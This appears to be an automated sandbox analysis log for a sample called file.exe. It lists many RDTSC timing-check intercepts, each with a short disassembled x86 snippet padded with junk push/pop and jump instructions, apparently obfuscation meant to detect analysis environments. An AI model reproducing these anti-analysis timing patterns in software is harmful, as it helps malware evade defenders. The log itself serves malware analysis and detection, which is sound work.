Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6AF02 second address: D6AF08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07F58 second address: D07F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6EDB7 second address: D6EDBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6EDBF second address: D6EDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7083A second address: D70847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70847 second address: D7084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7084B second address: D70851 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D70851 second address: D7087C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0D34B70907h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jl 00007F0D34B70900h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7087C second address: D708A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jg 00007F0D344F4AC3h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D708A2 second address: D708A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76AAA second address: D76AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75726 second address: D75740 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D34B70904h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75F9D second address: D75FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F0D344F4ABBh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jc 00007F0D344F4AB6h 0x0000001a je 00007F0D344F4AB6h 0x00000020 jmp 00007F0D344F4ABFh 0x00000025 popad 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push edi 0x0000002a pop edi 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75FDD second address: D75FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75FE4 second address: D75FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D75FEA second address: D75FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D762D8 second address: D762F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0D344F4AC9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D762F6 second address: D76312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D34B70908h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76640 second address: D7664E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7664E second address: D76671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F0D34B70904h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F0D34B708F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF959 second address: CFF95E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF95E second address: CFF968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF968 second address: CFF97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFF97A second address: CFF97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B29F second address: D7B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0D344F4ABEh 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B2B7 second address: D7B2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7B56C second address: D7B599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0D344F4AC3h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F0D344F4AC1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BA23 second address: D7BA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0D34B70906h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7BA41 second address: D7BA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C334 second address: D7C338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82194 second address: D821BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F0D344F4AC7h 0x00000010 js 00007F0D344F4ABCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D821BD second address: D821CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F0D34B708F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81243 second address: D81249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81249 second address: D81275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0D34B708FEh 0x0000000c jc 00007F0D34B70918h 0x00000012 jmp 00007F0D34B708FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D813CB second address: D813E2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0D344F4ABAh 0x00000008 pushad 0x00000009 js 00007F0D344F4AB6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8186A second address: D8186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8186E second address: D81872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81872 second address: D81880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 je 00007F0D34B708F6h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819AD second address: D819B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819B1 second address: D819B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819B5 second address: D819BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819BB second address: D819C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D819C1 second address: D81A0D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4AC8h 0x00000008 push edi 0x00000009 jmp 00007F0D344F4ABCh 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F0D344F4AF8h 0x00000017 pushad 0x00000018 jmp 00007F0D344F4AC2h 0x0000001d push eax 0x0000001e pop eax 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81A0D second address: D81A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81A11 second address: D81A2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2EEE3 second address: D2EEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D81FF1 second address: D82005 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F0D344F4ABAh 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82005 second address: D82016 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D34B708FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D82016 second address: D8201C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8201C second address: D82022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8093F second address: D80964 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0D344F4AC5h 0x0000000f jnl 00007F0D344F4AB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46285 second address: D2E36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d ja 00007F0D34B708F6h 0x00000013 jmp 00007F0D34B70903h 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b mov edx, dword ptr [ebp+122D197Ch] 0x00000021 call dword ptr [ebp+122D30CFh] 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007F0D34B70901h 0x0000002e jmp 00007F0D34B70903h 0x00000033 jmp 00007F0D34B708FCh 0x00000038 popad 0x00000039 pushad 0x0000003a jmp 00007F0D34B70903h 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46761 second address: D46767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46767 second address: D46771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0D34B708F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46A2D second address: D46A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46A34 second address: D46A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46A41 second address: D46A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46B7C second address: D46B86 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46B86 second address: D46BBC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0D344F4ABCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F0D344F4ABCh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F0D344F4ABBh 0x0000001b jng 00007F0D344F4ABCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D475F3 second address: D2EEE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dl, F4h 0x0000000c or dword ptr [ebp+122D2178h], eax 0x00000012 call dword ptr [ebp+1244A72Dh] 0x00000018 push edx 0x00000019 push eax 0x0000001a jg 00007F0D34B708F6h 0x00000020 pop eax 0x00000021 pop edx 0x00000022 jo 00007F0D34B70924h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0D34B708FAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89D9A second address: D89DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jo 00007F0D344F4AC9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D89F07 second address: D89F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A045 second address: D8A04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A04B second address: D8A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A050 second address: D8A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A1B2 second address: D8A1CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70905h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A480 second address: D8A484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A484 second address: D8A48E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0D34B708F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A48E second address: D8A497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A497 second address: D8A4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4A0 second address: D8A4C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4AC6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jo 00007F0D344F4B08h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4C9 second address: D8A4CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A4CF second address: D8A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D344F4AC2h 0x0000000d jmp 00007F0D344F4AC9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EC12 second address: D8EC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EC16 second address: D8EC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91AD6 second address: D91ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D91ADE second address: D91B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F0D344F4AC2h 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 pushad 0x00000011 jmp 00007F0D344F4AC9h 0x00000016 jmp 00007F0D344F4ABCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D93CBC second address: D93CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C12 second address: D96C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C18 second address: D96C28 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D34B70902h 0x00000008 jne 00007F0D34B708F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C28 second address: D96C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96C32 second address: D96C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AD22 second address: D9AD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9AD27 second address: D9AD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F346 second address: D9F350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0D344F4AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F490 second address: D9F4AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D34B708F6h 0x00000008 jmp 00007F0D34B708FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F0D34B708FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F5DB second address: D9F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9F5E5 second address: D9F5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FA01 second address: D9FA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC0h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0D344F4AC1h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9FA33 second address: D9FA37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FE0 second address: D46FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FE4 second address: D46FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FEE second address: D46FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FF2 second address: D46FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D46FF6 second address: D47066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D3594h] 0x00000028 mov ebx, dword ptr [ebp+12478038h] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F0D344F4AB8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D1800h], ebx 0x0000004e add eax, ebx 0x00000050 mov cx, dx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F0D344F4ABAh 0x0000005d rdtsc
